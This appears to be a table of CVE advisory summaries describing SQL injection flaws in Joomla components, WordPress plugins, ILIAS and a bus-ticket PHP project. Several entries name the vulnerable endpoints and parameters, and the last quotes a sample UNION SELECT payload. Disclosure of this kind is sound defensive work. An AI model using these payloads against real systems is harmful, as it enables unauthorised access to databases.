| CVE |
Vendors |
Products |
Updated |
CVSS v3.1 |
| Joomla! Component vAccount 2.0.2 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the vid parameter. Attackers can send GET requests to the vaccount-dashboard/expense endpoint with crafted SQL payloads in the vid parameter to extract sensitive database information including version and database names. |
| Joomla Component J-MultipleHotelReservation 6.0.7 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the hotel_id parameter. Attackers can send POST requests to the search-hotels endpoint with crafted SQL UNION SELECT statements to extract sensitive database information including table names and column data. |
| A vulnerability was identified in ILIAS Learning Management System 11.0. This issue affects the function ilTrQuery::executeQueries of the file components/ILIAS/Tracking/classes/class.ilTrQuery.php of the component Learning Progress Tracking. Such manipulation of the argument troup_table_nav leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. |
| Unauthenticated SQL Injection in ListingPro <= 2.9.10 versions. |
| Unauthenticated SQL Injection in wpDataTables <= 7.3.6 versions. |
| Subscriber SQL Injection in Events Schedule - WordPress Events Calendar Plugin <= 2.7.2 versions. |
| Subscriber SQL Injection in WooCommerce Frontend Manager – Ultimate < 6.7.7 versions. |
| Unauthenticated SQL Injection in WPJobster <= 6.3.5 versions. |
| Unauthenticated SQL Injection in JetSmartFilters <= 3.8.1 versions. |
| Unauthenticated SQL Injection in JetEngine <= 3.8.9.1 versions. |
| Unauthenticated SQL Injection in JetSearch <= 3.5.17 versions. |
| Unauthenticated SQL Injection in JetEngine < 3.8.9.1 versions. |
| Subscriber SQL Injection in Cornerstone < 7.8.8 versions. |
| Unauthenticated SQL Injection in JetEngine <= 3.8.10.1 versions. |
| Unauthenticated SQL Injection in Advanced Ads – Tracking < 3.0.7 versions. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Webilia Inc. Listdom allows Blind SQL Injection.
This issue affects Listdom: from n/a through 5.4.0. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Cargo RD Cargo Shipping Location for WooCommerce allows Blind SQL Injection.
This issue affects Cargo Shipping Location for WooCommerce: from n/a through 5.6. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Travel WP Travel Gutenberg Blocks allows Blind SQL Injection.
This issue affects WP Travel Gutenberg Blocks: from n/a through 3.9.4. |
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in VillaTheme GIFT4U allows Blind SQL Injection.
This issue affects GIFT4U: from n/a through 1.0.10. |
| Nur-Alam39 bus-ticket (no released versions; latest commit 459cabdbeb99c00225b26e46e3c2c30ae1de7bad) contains an unauthenticated SQL injection vulnerability in bus_info.php. The busid parameter received via HTTP POST is concatenated directly into a MySQL query (select * from bus_info where id=$busid) without sanitization, escaping, or parameterization, and in a numeric (unquoted) context. A remote, unauthenticated attacker can inject arbitrary SQL — for example a UNION-based payload such as busid=-1 UNION SELECT 1,2,3,4,5,6 — to read arbitrary data from the bus_service database. The application connects to the database as the MySQL root account with an empty password, increasing the potential impact. The query is executed via mysqli_query(), which does not permit stacked (semicolon-separated) statements. |
